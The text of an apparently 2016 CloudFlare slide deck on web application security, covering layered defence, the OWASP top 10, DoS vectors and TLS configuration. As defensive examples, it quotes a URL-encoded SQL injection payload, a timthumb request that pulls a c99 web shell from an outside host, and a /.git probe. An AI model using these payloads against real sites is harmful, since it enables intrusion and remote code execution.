Web Application Security

John Graham-Cumming |Chief Technology Officer, CloudFlare

March 2016

2

Agenda• Layered Web Application Security• 2015 Top Web Application Attack Techniques• Kitchen Sink Attacks• TLS

Introduction

4

Our mission

Help build a better Internet

5

Standards/PlatformAvailabilitySecurity Performance

Running applications on the Internet is challenging

“Hundreds of dollars a month for private hosting and it was still reliably crashing on or around decision day.”

“We're seeing some customers that are connecting to ixl.com via IPv6, which we are not equipped to handle.”

“The first flood of attack traffic was mitigated with some blocking techniques implemented by our CDN, but when the attack got more creative there was nothing more they could do.”

“Because our servers were only located in the U.S. at that time, some of our customers from other parts of the world were experiencing slower loading of the widget.”

6

We solve the challenges of the Internet

• Analytics• IPv6 gateway• DNSSEC• Google SPDY + HTTP2• Apps platform

Standards/Platform

• Load balancing• Always online• Redundant, Anycast

network

Availability

• Reputation-based security• Distributed denial of service

(DDoS) mitigation• Firewall• Secure socket layer (SSL)• Malware detection

Security

• Content delivery (CDN)• Authoritative DNS • Web content optimization

(WCO)• Front-end / mobile

optimization• Railgun™ WAN optimizer

Performance

7

Layered Web Application Security

9

What attackers attack• Web applications themselves

• e.g. attempted SQL injection

• e.g. DoS by hitting CPU expensive URI

• Web servers• Attempted access to files on machines

• SYN flooding to overwhelm TCP buffers

• Related infrastructure• Authoratitive DNS for a domain / DNS poisoning

• Domain registration

10

Layered Defense• Secure Coding Practices• Web Application Firewall

• Can protect against application level attacks

• Use one that can be customized for your application

• DoS mitigation service• DNS service that has withstood large DoS attacks• DNSSEC• A domain registrar with robust security policies to prevent transfer

11

Buying Time• A WAF buys time to patch vulnerabilities• Common to see vulnerabilities announced along with patches• But how long does it take to patch

12

Examples• December 14, 2015 CVE-2015-8562

• Joomla CMS Unserialize Vulnerability

• Released without a patch

• April 25, 2015 SUPEE-5344• Magento RCE Vulnerability

• April 15, 2015 CVE-2015-1635• Windows Server RCE Vulnerability

2015 Top Web Application Attack Techniques

14

OWASP Top 10 in 20151. A5 Security Misconfiguration2. A9 Using Components with

Known Vulnerabilities3. A6 Sensitive Data Exposure4. A4 Insecure Direct Object

References5. A1 Injection

6. A3 XSS7. A7 Missing Function Level

Access Control8. A8 Cross Site Request Forgery9. A10 Unvalidated Redirects and

Forwards10.A2 Weak authentication and

session management

15

Common Web DoS Vectors• Requests without a user agent

• Drop requests that have no User-Agent field

• WordPress pingback attacks• Drop WordPress pingbacks

• Fake user agent• Validate User-Agent to identify real browsers

16

Common Web DoS Vectors• Faulty data sanitization

/skin/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20 count(*),concat((select%20concat(0x3a,md5(1122),\0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%232.

• Exploitation of timthumb for RCE

GET /wp-content/themes/thumb.php?src=http://dsf2kh34as.co/c99.php

17

Common Web DoS Vectors• Incorrect SCM data access

GET /.git/HEAD HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)

Kitchen Sink Attacks

19

Everything they’ve got• Common to see attackers try multiple vectors to bring down a web site

1. Simultaneous SYN flood, DNS reflection attack, and authoratitive DNS attack

2. Using multiple layer 7 (HTTP/HTTPS) botnets at the same time

3. 1 and 2

20

Typical DoS volume at CloudFlare

21

Recent 400 Gbps DoS attacks

TLS

23

24

DROWNMarch 1

2016

25

CloudFlare’s TLS Configuration• Public and on Github

https://github.com/cloudflare/sslconfig

ssl_protocols TLSv1 TLSv1.1 TLSv1.2;ssl_ciphers EECDH+CHACHA20:EECDH+CHACHA20-draft:EECDH+AES128:RSA+AES128:EECDH+AES256:RSA+AES256:EECDH+3DES:RSA+3DES:!MD5;ssl_prefer_server_ciphers on;

Conclusion

27

Conclusion• Layered Defense• Patch but use a WAF to buy time• Stay on top of TLS